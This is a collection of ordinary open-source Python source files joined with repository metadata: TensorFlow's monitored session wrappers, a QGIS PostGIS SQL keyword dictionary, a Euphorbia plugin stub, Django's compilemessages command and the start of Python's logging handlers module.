self._coordinated_creator = self._CoordinatedSessionCreator(
session_creator=session_creator or ChiefSessionCreator(),
hooks=self._hooks)
if should_recover:
self._sess = _RecoverableSession(self._coordinated_creator)
else:
self._sess = self._coordinated_creator.create_session()
@property
def graph(self):
"""The graph that was launched in this session."""
if self._tf_sess() is None:
return None
return self._tf_sess().graph
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
"""Run ops in the monitored session.
This method is completely compatible with the `tf.Session.run()` method.
Args:
fetches: Same as `tf.Session.run()`.
feed_dict: Same as `tf.Session.run()`.
options: Same as `tf.Session.run()`.
run_metadata: Same as `tf.Session.run()`.
Returns:
Same as `tf.Session.run()`.
"""
return self._sess.run(fetches,
feed_dict=feed_dict,
options=options,
run_metadata=run_metadata)
def should_stop(self):
if self._sess:
return self._sess.should_stop()
return True
def close(self):
self._close_internal()
def __enter__(self):
return self
def __exit__(self, exception_type, exception_value, traceback):
if exception_type in [errors.OutOfRangeError, StopIteration]:
exception_type = None
self._close_internal(exception_type)
# __exit__ should return True to suppress an exception.
return exception_type is None
class _CoordinatedSessionCreator(object):
"""Factory for the _RecoverableSession."""
def __init__(self, session_creator, hooks):
self._session_creator = session_creator
self._hooks = hooks
self.coord = None
self.tf_sess = None
def create_session(self):
"""Creates a coordinated session."""
# Keep the tf_sess for unit testing.
self.tf_sess = self._session_creator.create_session()
# We don't want coordinator to suppress any exception.
self.coord = coordinator.Coordinator(clean_stop_exception_types=[])
queue_runner.start_queue_runners(sess=self.tf_sess, coord=self.coord)
# Inform the hooks that a new session has been created.
for hook in self._hooks:
hook.after_create_session(self.tf_sess, self.coord)
return _CoordinatedSession(
_HookedSession(self.tf_sess, self._hooks), self.coord)
def _close_internal(self, exception_type=None):
try:
if not exception_type:
for h in self._hooks:
h.end(self._coordinated_creator.tf_sess)
finally:
try:
self._sess.close()
finally:
self._sess = None
self._coordinated_creator.tf_sess = None
self._coordinated_creator.coord = None
if not self._graph_was_finalized:
ops.get_default_graph()._unsafe_unfinalize() # pylint: disable=protected-access
def _is_closed(self):
"""Return True if the supervised session is closed. For tests only.
Returns:
A boolean.
"""
return self._coordinated_creator.tf_sess is None
def _tf_sess(self):
return self._coordinated_creator.tf_sess
class MonitoredSession(_MonitoredSession):
"""Session-like object that handles initialization, recovery and hooks.
Example usage:
```python
saver_hook = CheckpointSaverHook(...)
summary_hook = SummaryHook(...)
with MonitoredSession(session_creator=ChiefSessionCreator(...),
hooks=[saver_hook, summary_hook]) as sess:
while not sess.should_stop():
sess.run(train_op)
```
Initialization: At creation time the monitored session does following things
in given order:
* calls `hook.begin()` for each given hook
* finalizes the graph via `scaffold.finalize()`
* create session
* initializes the model via initialization ops provided by `Scaffold`
* restores variables if a checkpoint exists
* launches queue runners
Run: When `run()` is called, the monitored session does following things:
* calls `hook.before_run()`
* calls TensorFlow `session.run()` with merged fetches and feed_dict
* calls `hook.after_run()`
* returns result of `session.run()` asked by user
* if `AbortedError` occurs, it recovers or reinitializes the session before
executing the run() call again
Exit: At the `close()`, the monitored session does following things in order:
* calls `hook.end()`
* closes the queue runners and the session
* suppresses `OutOfRange` error which indicates that all inputs have been
processed if the monitored_session is used as a context
How to set `tf.Session` arguments:
* In most cases you can set session arguments as follows:
```python
MonitoredSession(
session_creator=ChiefSessionCreator(master=..., config=...))
```
* In distributed setting for a non-chief worker, you can use following:
```python
MonitoredSession(
session_creator=WorkerSessionCreator(master=..., config=...))
```
See `MonitoredTrainingSession` for an example usage based on chief or worker.
Args:
session_creator: A factory object to create session. Typically a
`ChiefSessionCreator` which is the default one.
hooks: An iterable of `SessionRunHook' objects.
Returns:
A MonitoredSession object.
"""
def __init__(self, session_creator=None, hooks=None):
super(MonitoredSession, self).__init__(
session_creator, hooks, should_recover=True)
class SingularMonitoredSession(_MonitoredSession):
"""Session-like object that handles initialization, restoring, and hooks.
Please note that this utility is not recommended for distributed settings.
For distributed settings, please use `tf.train.MonitoredSession`. The
differences between `MonitoredSession` and `SingularMonitoredSession` are:
* `MonitoredSession` handles `AbortedError` for distributed settings,
but `SingularMonitoredSession` does not.
* `MonitoredSession` can be created in `chief` or `worker` modes.
`SingularMonitoredSession` is always created as `chief`.
* You can access the raw `tf.Session` object used by
`SingularMonitoredSession`, whereas in MonitoredSession the raw session is
private. This can be used:
- To `run` without hooks.
- To save and restore.
* All other functionality is identical.
Example usage:
```python
saver_hook = CheckpointSaverHook(...)
summary_hook = SummaryHook(...)
with SingularMonitoredSession(hooks=[saver_hook, summary_hook]) as sess:
while not sess.should_stop():
sess.run(train_op)
```
Initialization: At creation time the hooked session does following things
in given order:
* calls `hook.begin()` for each given hook
* finalizes the graph via `scaffold.finalize()`
* create session
* initializes the model via initialization ops provided by `Scaffold`
* restores variables if a checkpoint exists
* launches queue runners
Run: When `run()` is called, the hooked session does following things:
* calls `hook.before_run()`
* calls TensorFlow `session.run()` with merged fetches and feed_dict
* calls `hook.after_run()`
* returns result of `session.run()` asked by user
Exit: At the `close()`, the hooked session does following things in order:
* calls `hook.end()`
* closes the queue runners and the session
* surpresses `OutOfRange` error which indicates that all inputs have been
processed if the `SingularMonitoredSession` is used as a context.
"""
def __init__(self,
hooks=None,
scaffold=None,
master='',
config=None,
checkpoint_dir=None):
"""Creates a SingularMonitoredSession.
Args:
hooks: An iterable of `SessionRunHook' objects.
scaffold: A `Scaffold` used for gathering or building supportive ops. If
not specified a default one is created. It's used to finalize the graph.
master: `String` representation of the TensorFlow master to use.
config: `ConfigProto` proto used to configure the session.
checkpoint_dir: A string. Optional path to a directory where to restore
variables.
"""
session_creator = ChiefSessionCreator(
scaffold=scaffold,
master=master,
config=config,
checkpoint_dir=checkpoint_dir)
super(SingularMonitoredSession, self).__init__(
session_creator, hooks, should_recover=False)
def raw_session(self):
"""Returns underlying `TensorFlow.Session` object."""
return self._tf_sess()
class _WrappedSession(object):
"""Wrapper around a `tf.Session`.
This wrapper is used as a base class for various session wrappers
that provide additional functionality such as monitoring, coordination,
and recovery.
In addition to the methods exported by `SessionInterface` the wrapper
provides a method to check for stop and never raises exceptions from
calls to `close()`.
"""
def __init__(self, sess):
"""Creates a `_WrappedSession`.
Args:
sess: A `tf.Session` or `_WrappedSession` object. The wrapped session.
"""
self._sess = sess
self._wrapped_is_stoppable = isinstance(self._sess, _WrappedSession)
@property
def graph(self):
return self._sess.graph
@property
def sess_str(self):
return self._sess.sess_str
def should_stop(self):
"""Return true if this session should not be used anymore.
Always return True if the session was closed.
Returns:
True if the session should stop, False otherwise.
"""
if self._check_stop():
return True
if self._sess:
return self._wrapped_is_stoppable and self._sess.should_stop()
return True
def _check_stop(self):
"""Hook for subclasses to provide their own stop condition.
Returns:
True if the session should stop, False otherwise.
"""
return False
def close(self):
if self._sess:
try:
self._sess.close()
finally:
self._sess = None
def run(self, *args, **kwargs):
return self._sess.run(*args, **kwargs)
class _RecoverableSession(_WrappedSession):
"""A wrapped session that recreates a session on `tf.errors.AbortedError`.
The constructor is passed a SessionCreator object, not a session.
Calls to `run()` are delegated to the wrapped session. If a call raises the
exception `tf.errors.AbortedError`, the wrapped session is closed, and a new
one is created by calling the factory again.
"""
def __init__(self, sess_creator):
"""Create a new `_RecoverableSession`.
The value returned by calling `sess_creator.create_session()` will be the
session wrapped by this recoverable session.
Args:
sess_creator: A 'SessionCreator' to be wrapped by recoverable.
"""
self._sess_creator = sess_creator
_WrappedSession.__init__(self, self._create_session())
def _create_session(self):
while True:
try:
return self._sess_creator.create_session()
except errors.AbortedError:
logging.info('An AbortedError was raised during initialization. '
'It\'s most likely due to a preemption in a connected '
'worker/ps. A new session will be created.')
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
while True:
try:
if not self._sess:
self._sess = self._create_session()
return self._sess.run(fetches,
feed_dict=feed_dict,
options=options,
run_metadata=run_metadata)
except errors.AbortedError:
logging.info('An AbortedError was raised. Closing the current session. '
'It\'s most likely due to a preemption in a connected '
'worker/ps. '
'A new session will be created on the next session.run().')
self.close()
self._sess = None
class _CoordinatedSession(_WrappedSession):
"""A wrapped session that works with a `tf.Coordinator`.
Calls to `run()` are delegated to the wrapped session. If a call
raises an exception, the exception is reported to the coordinator.
In addition, after each call to `run()` this session ask the coordinator if
the session should stop. In that case it will will join all the threads
registered with the coordinator before returning.
If the coordinator was requested to stop with an exception, that exception
will be re-raised from the call to `run()`.
"""
def __init__(self, sess, coord):
"""Create a new `_CoordinatedSession`.
Args:
sess: A `tf.Session` object. The wrapped session.
coord: A `tf.train.Coordinator` object.
"""
_WrappedSession.__init__(self, sess)
self._coord = coord
def _check_stop(self):
# Check with the coordinator if we should stop.
return self._coord.should_stop()
def close(self):
self._coord.request_stop()
try:
self._coord.join()
finally:
try:
_WrappedSession.close(self)
except Exception: # pylint: disable=broad-except
# We intentionally suppress exceptions from the close() here since
# useful exceptions are already reported by join().
pass
class _HookedSession(_WrappedSession):
"""A _WrappedSession that calls hooks during calls to run().
The list of hooks to call is passed in the constructor. Before each call
to `run()` the session calls the `before_run()` method of the hooks, which
can return additional ops or tensors to run. These are added to the arguments
of the call to `run()`.
When the `run()` call finishes, the session calls the `after_run()` methods of
the hooks, passing the values returned by the `run()` call corresponding to
the ops and tensors that each hook requested.
If any call to the hooks, requests stop via run_context the session will be
marked as needing to stop and its `should_stop()` method will now return
`True`.
"""
def __init__(self, sess, hooks):
"""Initializes a _HookedSession object.
Args:
sess: A `tf.Session` or a `_WrappedSession` object.
hooks: An iterable of `SessionRunHook' objects.
"""
_WrappedSession.__init__(self, sess)
self._hooks = hooks
self._should_stop = False
def _check_stop(self):
"""See base class."""
return self._should_stop
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
"""See base class."""
if self.should_stop():
raise RuntimeError('Run called even after should_stop requested.')
actual_fetches = {'caller': fetches}
run_context = session_run_hook.SessionRunContext(
original_args=session_run_hook.SessionRunArgs(fetches, feed_dict),
session=self._sess)
options = options or config_pb2.RunOptions()
feed_dict = self._call_hook_before_run(run_context, actual_fetches,
feed_dict, options)
# Do session run.
run_metadata = run_metadata or config_pb2.RunMetadata()
outputs = _WrappedSession.run(self,
fetches=actual_fetches,
feed_dict=feed_dict,
options=options,
run_metadata=run_metadata)
for hook in self._hooks:
hook.after_run(
run_context,
session_run_hook.SessionRunValues(
results=outputs[hook] if hook in outputs else None,
options=options,
run_metadata=run_metadata))
self._should_stop = self._should_stop or run_context.stop_requested
return outputs['caller']
def _call_hook_before_run(self, run_context, fetch_dict, user_feed_dict,
options):
"""Calls hooks.before_run and handles requests from hooks."""
hook_feeds = {}
for hook in self._hooks:
request = hook.before_run(run_context)
if request is not None:
if request.fetches is not None:
fetch_dict[hook] = request.fetches
if request.feed_dict:
self._raise_if_feeds_intersects(
hook_feeds, request.feed_dict,
'Same tensor is fed by two hooks.')
hook_feeds.update(request.feed_dict)
if request.options:
self._merge_run_options(options, request.options)
if not hook_feeds:
return user_feed_dict
if not user_feed_dict:
return hook_feeds
self._raise_if_feeds_intersects(
user_feed_dict, hook_feeds,
'Same tensor is fed by a SessionRunHook and user.')
hook_feeds.update(user_feed_dict)
return hook_feeds
def _raise_if_feeds_intersects(self, feeds1, feeds2, message):
intersection = set(feeds1.keys()) & set(feeds2.keys())
if intersection:
raise RuntimeError(message + ' Conflict(s): ' + str(list(intersection)))
def _merge_run_options(self, options, incoming_options):
"""Merge two instances of RunOptions into the first one.
During the merger, the numerical fields including trace_level,
timeout_in_ms, inter_op_thread_pool are set to the larger one of the two.
The boolean value is set to the logical OR of the two.
debug_tensor_watch_opts of the original options is extended with that from
the incoming one.
Args:
options: The options to merge into.
incoming_options: The options to be merged into the first argument.
"""
options.trace_level = max(options.trace_level, incoming_options.trace_level)
options.timeout_in_ms = max(options.timeout_in_ms,
incoming_options.timeout_in_ms)
options.inter_op_thread_pool = max(options.inter_op_thread_pool,
incoming_options.inter_op_thread_pool)
options.output_partition_graphs = max(
options.output_partition_graphs,
incoming_options.output_partition_graphs)
options.debug_options.debug_tensor_watch_opts.extend(
incoming_options.debug_options.debug_tensor_watch_opts)
|
apache-2.0
|
boundlessgeo/QGIS
|
python/plugins/db_manager/db_plugins/postgis/sql_dictionary.py
|
29
|
13470
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
sql_dictionary.py
---------------------
Date : April 2012
Copyright : (C) 2012 by Giuseppe Sucameli
Email : brush dot tyler at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
from builtins import map
__author__ = 'Giuseppe Sucameli'
__date__ = 'April 2012'
__copyright__ = '(C) 2012, Giuseppe Sucameli'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
# keywords
keywords = [
# TODO get them from a reference page
"action", "add", "after", "all", "alter", "analyze", "and", "as", "asc",
"before", "begin", "between", "by", "cascade", "case", "cast", "check",
"collate", "column", "commit", "constraint", "create", "cross", "current_date",
"current_time", "current_timestamp", "default", "deferrable", "deferred",
"delete", "desc", "distinct", "drop", "each", "else", "end", "escape",
"except", "exists", "for", "foreign", "from", "full", "group", "having",
"ignore", "immediate", "in", "initially", "inner", "insert", "intersect",
"into", "is", "isnull", "join", "key", "left", "like", "limit", "match",
"natural", "no", "not", "notnull", "null", "of", "offset", "on", "or", "order",
"outer", "primary", "references", "release", "restrict", "right", "rollback",
"row", "savepoint", "select", "set", "table", "temporary", "then", "to",
"transaction", "trigger", "union", "unique", "update", "using", "values",
"view", "when", "where",
"absolute", "admin", "aggregate", "alias", "allocate", "analyse", "any", "are",
"array", "asensitive", "assertion", "asymmetric", "at", "atomic",
"authorization", "avg", "bigint", "binary", "bit", "bit_length", "blob",
"boolean", "both", "breadth", "call", "called", "cardinality", "cascaded",
"catalog", "ceil", "ceiling", "char", "character", "character_length",
"char_length", "class", "clob", "close", "coalesce", "collation", "collect",
"completion", "condition", "connect", "connection", "constraints",
"constructor", "continue", "convert", "corr", "corresponding", "count",
"covar_pop", "covar_samp", "cube", "cume_dist", "current",
"current_default_transform_group", "current_path", "current_role",
"current_transform_group_for_type", "current_user", "cursor", "cycle", "data",
"date", "day", "deallocate", "dec", "decimal", "declare", "dense_rank",
"depth", "deref", "describe", "descriptor", "destroy", "destructor",
"deterministic", "diagnostics", "dictionary", "disconnect", "do", "domain",
"double", "dynamic", "element", "end-exec", "equals", "every", "exception",
"exec", "execute", "exp", "external", "extract", "false", "fetch", "filter",
"first", "float", "floor", "found", "free", "freeze", "function", "fusion",
"general", "get", "global", "go", "goto", "grant", "grouping", "hold", "host",
"hour", "identity", "ilike", "indicator", "initialize", "inout", "input",
"insensitive", "int", "integer", "intersection", "interval", "isolation",
"iterate", "language", "large", "last", "lateral", "leading", "less", "level",
"ln", "local", "localtime", "localtimestamp", "locator", "lower", "map", "max",
"member", "merge", "method", "min", "minute", "mod", "modifies", "modify",
"module", "month", "multiset", "names", "national", "nchar", "nclob", "new",
"next", "none", "normalize", "nullif", "numeric", "object", "octet_length",
"off", "old", "only", "open", "operation", "option", "ordinality", "out",
"output", "over", "overlaps", "overlay", "pad", "parameter", "parameters",
"partial", "partition", "path", "percentile_cont", "percentile_disc",
"percent_rank", "placing", "position", "postfix", "power", "precision",
"prefix", "preorder", "prepare", "preserve", "prior", "privileges",
"procedure", "public", "range", "rank", "read", "reads", "real", "recursive",
"ref", "referencing", "regr_avgx", "regr_avgy", "regr_count", "regr_intercept",
"regr_r2", "regr_slope", "regr_sxx", "regr_sxy", "regr_syy", "relative",
"result", "return", "returning", "returns", "revoke", "role", "rollup",
"routine", "rows", "row_number", "schema", "scope", "scroll", "search",
"second", "section", "sensitive", "sequence", "session", "session_user",
"sets", "similar", "size", "smallint", "some", "space", "specific",
"specifictype", "sql", "sqlcode", "sqlerror", "sqlexception", "sqlstate",
"sqlwarning", "sqrt", "start", "state", "statement", "static", "stddev_pop",
"stddev_samp", "structure", "submultiset", "substring", "sum", "symmetric",
"system", "system_user", "tablesample", "terminate", "than", "time",
"timestamp", "timezone_hour", "timezone_minute", "trailing", "translate",
"translation", "treat", "trim", "true", "uescape", "under", "unknown",
"unnest", "upper", "usage", "user", "value", "varchar", "variable", "varying",
"var_pop", "var_samp", "verbose", "whenever", "width_bucket", "window", "with",
"within", "without", "work", "write", "xml", "xmlagg", "xmlattributes",
"xmlbinary", "xmlcomment", "xmlconcat", "xmlelement", "xmlforest",
"xmlnamespaces", "xmlparse", "xmlpi", "xmlroot", "xmlserialize", "year", "zone"
]
postgis_keywords = []
# functions
functions = [
"coalesce",
"nullif", "quote", "random",
"replace", "soundex"
]
operators = [
' AND ', ' OR ', '||', ' < ', ' <= ', ' > ', ' >= ', ' = ', ' <> ', ' IS ', ' IS NOT ', ' IN ', ' LIKE ', ' GLOB ', ' MATCH ', ' REGEXP '
]
math_functions = [
# SQL math functions
"Abs", "ACos", "ASin", "ATan", "Cos", "Cot", "Degrees", "Exp", "Floor", "Log", "Log2",
"Log10", "Pi", "Radians", "Round", "Sign", "Sin", "Sqrt", "StdDev_Pop", "StdDev_Samp", "Tan",
"Var_Pop", "Var_Samp"]
string_functions = ["Length", "Lower", "Upper", "Like", "Trim", "LTrim", "RTrim", "Replace", "Substr"]
aggregate_functions = [
"Max", "Min", "Avg", "Count", "Sum", "Group_Concat", "Total", "Var_Pop", "Var_Samp", "StdDev_Pop", "StdDev_Samp"
]
postgis_functions = [ # from http://www.postgis.org/docs/reference.html
# 7.1. PostgreSQL PostGIS Types
"*box2d", "*box3d", "*box3d_extent", "*geometry", "*geometry_dump", "*geography",
# 7.2. Management Functions
"*addgeometrycolumn", "*dropgeometrycolumn", "*dropgeometrytable", "*postgis_full_version",
"*postgis_geos_version", "*postgis_libxml_version", "*postgis_lib_build_date",
"*postgis_lib_version", "*postgis_proj_version", "*postgis_scripts_build_date",
"*postgis_scripts_installed", "*postgis_scripts_released", "*postgis_uses_stats", "*postgis_version",
"*populate_geometry_columns", "*probe_geometry_columns", "*updategeometrysrid",
# 7.3. Geometry Constructors
"*ST_bdpolyfromtext", "*ST_bdmpolyfromtext", "*ST_geogfromtext", "*ST_geographyfromtext",
"*ST_geogfromwkb", "*ST_geomcollfromtext", "*ST_geomfromewkb", "*ST_geomfromewkt",
"*ST_geometryfromtext", "*ST_geomfromgml", "*ST_geomfromkml", "*ST_gmltosql", "*ST_geomfromtext",
"*ST_geomfromwkb", "*ST_linefrommultipoint", "*ST_linefromtext", "*ST_linefromwkb",
"*ST_linestringfromwkb", "*ST_makebox2d", "*ST_makebox3d", "ST_MakeLine", "*ST_makeenvelope",
"ST_MakePolygon", "ST_MakePoint", "ST_MakePointM", "*ST_MLinefromtext", "*ST_mpointfromtext",
"*ST_mpolyfromtext", "ST_Point", "*ST_pointfromtext", "*ST_pointfromwkb", "ST_Polygon",
"*ST_polygonfromtext", "*ST_wkbtosql", "*ST_wkttosql",
# 7.4. Geometry Accessors
"GeometryType", "ST_Boundary", "*ST_coorddim", "ST_Dimension", "ST_EndPoint", "ST_Envelope",
"ST_ExteriorRing", "ST_GeometryN", "ST_GeometryType", "ST_InteriorRingN", "ST_isClosed",
"ST_isEmpty", "ST_isRing", "ST_isSimple", "ST_isValid", "ST_isValidReason", "ST_M", "ST_NDims",
"ST_NPoints", "ST_NRings", "ST_NumGeometries", "ST_NumInteriorrings", "ST_NumInteriorring",
"ST_NumPoints", "ST_PointN", "ST_Srid", "ST_StartPoint", "ST_Summary", "ST_X", "ST_Y", "ST_Z",
"*ST_zmflag",
# 7.5. Geometry Editors
"ST_AddPoint", "ST_Affine", "ST_Force2D", "*ST_Force3D", "*ST_Force3dZ", "*ST_Force3DM",
"*ST_Force_4d", "*ST_force_collection", "*ST_forcerhr", "*ST_linemerge", "*ST_collectionextract",
"ST_Multi", "*ST_removepoint", "*ST_reverse", "*ST_rotate", "*ST_rotatex", "*ST_rotatey",
"*ST_rotatez", "*ST_scale", "*ST_segmentize", "*ST_setpoint", "ST_SetSrid", "ST_SnapToGrid",
"ST_Transform", "ST_Translate", "*ST_transscale",
# 7.6. Geometry Outputs
"*ST_asbinary", "*ST_asewkb", "*ST_asewkt", "*ST_asgeojson", "*ST_asgml", "*ST_ashexewkb", "*ST_askml",
"*ST_assvg", "*ST_geohash", "ST_Astext",
# 7.7. Operators
# 7.8. Spatial Relationships and Measurements
"ST_Area", "ST_Azimuth", "ST_Centroid", "ST_ClosestPoint", "ST_Contains", "ST_ContainsProperly",
"ST_Covers", "ST_CoveredBy", "ST_Crosses", "*ST_linecrossingdirection", "ST_Cisjoint",
"ST_Distance", "*ST_hausdorffdistance", "*ST_maxdistance", "ST_Distance_Sphere",
"ST_Distance_Spheroid", "*ST_DFullyWithin", "ST_DWithin", "ST_Equals", "*ST_hasarc",
"ST_Intersects", "ST_Length", "*ST_Length2d", "*ST_length3d", "ST_Length_Spheroid",
"*ST_length2d_spheroid", "*ST_length3d_spheroid", "*ST_longestline", "*ST_orderingequals",
"ST_Overlaps", "*ST_perimeter", "*ST_perimeter2d", "*ST_perimeter3d", "ST_PointOnSurface",
"ST_Relate", "ST_ShortestLine", "ST_Touches", "ST_Within",
# 7.9. Geometry Processing Functions
"ST_Buffer", "ST_BuildArea", "ST_Collect", "ST_ConvexHull", "*ST_curvetoline", "ST_Difference",
"ST_Dump", "*ST_dumppoints", "*ST_dumprings", "ST_Intersection", "*ST_linetocurve", "*ST_memunion",
"*ST_minimumboundingcircle", "*ST_polygonize", "*ST_shift_longitude", "ST_Simplify",
"ST_SimplifyPreserveTopology", "ST_SymDifference", "ST_Union",
# 7.10. Linear Referencing
"ST_Line_Interpolate_Point", "ST_Line_Locate_Point", "ST_Line_Substring",
"*ST_locate_along_measure", "*ST_locate_between_measures", "*ST_locatebetweenelevations",
"*ST_addmeasure",
# 7.11. Long Transactions Support
"*addauth", "*checkauth", "*disablelongtransactions", "*enablelongtransactions", "*lockrow",
"*unlockrows",
# 7.12. Miscellaneous Functions
"*ST_accum", "*box2d", "*box3d", "*ST_estimated_extent", "*ST_expand", "ST_Extent", "*ST_extent3d",
"*find_srid", "*ST_mem_size", "*ST_point_inside_circle", "ST_XMax", "ST_XMin", "ST_YMax", "ST_YMin",
"ST_ZMax", "ST_ZMin",
# 7.13. Exceptional Functions
"*postgis_addbbox", "*postgis_dropbbox", "*postgis_hasbbox"
]
# constants
constants = ["null", "false", "true"]
postgis_constants = []
def getSqlDictionary(spatial=True):
def strip_star(s):
if s[0] == '*':
return s.lower()[1:]
else:
return s.lower()
k, c, f = list(keywords), list(constants), list(functions)
if spatial:
k += postgis_keywords
f += postgis_functions
c += postgis_constants
return {'keyword': list(map(strip_star, k)), 'constant': list(map(strip_star, c)), 'function': list(map(strip_star, f))}
def getQueryBuilderDictionary():
# concat functions
def ff(l):
return [s for s in l if s[0] != '*']
def add_paren(l):
return [s + "(" for s in l]
foo = sorted(add_paren(ff(list(set.union(set(functions), set(postgis_functions))))))
m = sorted(add_paren(ff(math_functions)))
agg = sorted(add_paren(ff(aggregate_functions)))
op = ff(operators)
s = sorted(add_paren(ff(string_functions)))
return {'function': foo, 'math': m, 'aggregate': agg, 'operator': op, 'string': s}
|
gpl-2.0
|
cvkbtzx/euphorbia
|
EuphorbiaEditor/exts/euphorbia.py
|
1
|
1300
|
#-*- coding:utf-8 -*-
## EUPHORBIA - GTK LaTeX Editor
## Module: EuphorbiaEditor.exts.euphorbia
## Copyright (C) 2008-2011 Bzoloid
##
## This program is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License
## as published by the Free Software Foundation; either version 2
## of the License, or (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software Foundation,
## Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""Euphorbia plugin wrapper."""
from ..ui.palette import Palette
from ..ui.tabwrapper import TabWrapper
app = None
#------------------------------------------------------------------------------
class Plugin(object):
def __init__(self):
self.app = app
def activate(self):
pass
def deactivate(self):
pass
#------------------------------------------------------------------------------
|
gpl-2.0
|
georgemarshall/django
|
django/core/management/commands/compilemessages.py
|
33
|
6223
|
import codecs
import concurrent.futures
import glob
import os
from django.core.management.base import BaseCommand, CommandError
from django.core.management.utils import (
find_command, is_ignored_path, popen_wrapper,
)
def has_bom(fn):
with open(fn, 'rb') as f:
sample = f.read(4)
return sample.startswith((codecs.BOM_UTF8, codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE))
def is_writable(path):
# Known side effect: updating file access/modified time to current time if
# it is writable.
try:
with open(path, 'a'):
os.utime(path, None)
except OSError:
return False
return True
class Command(BaseCommand):
help = 'Compiles .po files to .mo files for use with builtin gettext support.'
requires_system_checks = False
program = 'msgfmt'
program_options = ['--check-format']
def add_arguments(self, parser):
parser.add_argument(
'--locale', '-l', action='append', default=[],
help='Locale(s) to process (e.g. de_AT). Default is to process all. '
'Can be used multiple times.',
)
parser.add_argument(
'--exclude', '-x', action='append', default=[],
help='Locales to exclude. Default is none. Can be used multiple times.',
)
parser.add_argument(
'--use-fuzzy', '-f', dest='fuzzy', action='store_true',
help='Use fuzzy translations.',
)
parser.add_argument(
'--ignore', '-i', action='append', dest='ignore_patterns',
default=[], metavar='PATTERN',
help='Ignore directories matching this glob-style pattern. '
'Use multiple times to ignore more.',
)
def handle(self, **options):
locale = options['locale']
exclude = options['exclude']
ignore_patterns = set(options['ignore_patterns'])
self.verbosity = options['verbosity']
if options['fuzzy']:
self.program_options = self.program_options + ['-f']
if find_command(self.program) is None:
raise CommandError("Can't find %s. Make sure you have GNU gettext "
"tools 0.15 or newer installed." % self.program)
basedirs = [os.path.join('conf', 'locale'), 'locale']
if os.environ.get('DJANGO_SETTINGS_MODULE'):
from django.conf import settings
basedirs.extend(settings.LOCALE_PATHS)
# Walk entire tree, looking for locale directories
for dirpath, dirnames, filenames in os.walk('.', topdown=True):
for dirname in dirnames:
if is_ignored_path(os.path.normpath(os.path.join(dirpath, dirname)), ignore_patterns):
dirnames.remove(dirname)
elif dirname == 'locale':
basedirs.append(os.path.join(dirpath, dirname))
# Gather existing directories.
basedirs = set(map(os.path.abspath, filter(os.path.isdir, basedirs)))
if not basedirs:
raise CommandError("This script should be run from the Django Git "
"checkout or your project or app tree, or with "
"the settings module specified.")
# Build locale list
all_locales = []
for basedir in basedirs:
locale_dirs = filter(os.path.isdir, glob.glob('%s/*' % basedir))
all_locales.extend(map(os.path.basename, locale_dirs))
# Account for excluded locales
locales = locale or all_locales
locales = set(locales).difference(exclude)
self.has_errors = False
for basedir in basedirs:
if locales:
dirs = [os.path.join(basedir, l, 'LC_MESSAGES') for l in locales]
else:
dirs = [basedir]
locations = []
for ldir in dirs:
for dirpath, dirnames, filenames in os.walk(ldir):
locations.extend((dirpath, f) for f in filenames if f.endswith('.po'))
if locations:
self.compile_messages(locations)
if self.has_errors:
raise CommandError('compilemessages generated one or more errors.')
def compile_messages(self, locations):
"""
Locations is a list of tuples: [(directory, file), ...]
"""
with concurrent.futures.ThreadPoolExecutor() as executor:
futures = []
for i, (dirpath, f) in enumerate(locations):
if self.verbosity > 0:
self.stdout.write('processing file %s in %s\n' % (f, dirpath))
po_path = os.path.join(dirpath, f)
if has_bom(po_path):
self.stderr.write(
'The %s file has a BOM (Byte Order Mark). Django only '
'supports .po files encoded in UTF-8 and without any BOM.' % po_path
)
self.has_errors = True
continue
base_path = os.path.splitext(po_path)[0]
# Check writability on first location
if i == 0 and not is_writable(base_path + '.mo'):
self.stderr.write(
'The po files under %s are in a seemingly not writable location. '
'mo files will not be updated/created.' % dirpath
)
self.has_errors = True
return
args = [self.program] + self.program_options + [
'-o', base_path + '.mo', base_path + '.po'
]
futures.append(executor.submit(popen_wrapper, args))
for future in concurrent.futures.as_completed(futures):
output, errors, status = future.result()
if status:
if self.verbosity > 0:
if errors:
self.stderr.write("Execution of %s failed: %s" % (self.program, errors))
else:
self.stderr.write("Execution of %s failed" % self.program)
self.has_errors = True
|
bsd-3-clause
|
mm112287/2015cda-24
|
static/Brython3.1.1-20150328-091302/Lib/logging/handlers.py
|
736
|
55579
|
# Copyright 2001-2013 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
Additional handlers for the logging package for Python. The core package is
based on PEP 282 and comments thereto in comp.lang.python.
Copyright (C) 2001-2013 Vinay Sajip. All Rights Reserved.
To use, simply 'import logging.handlers' and log away!
"""
import errno, logging, socket, os, pickle, struct, time, re
from codecs import BOM_UTF8
from stat import ST_DEV, ST_INO, ST_MTIME
import queue
try:
import threading
except ImportError: #pragma: no cover
threading = None
#
# Some constants...
#
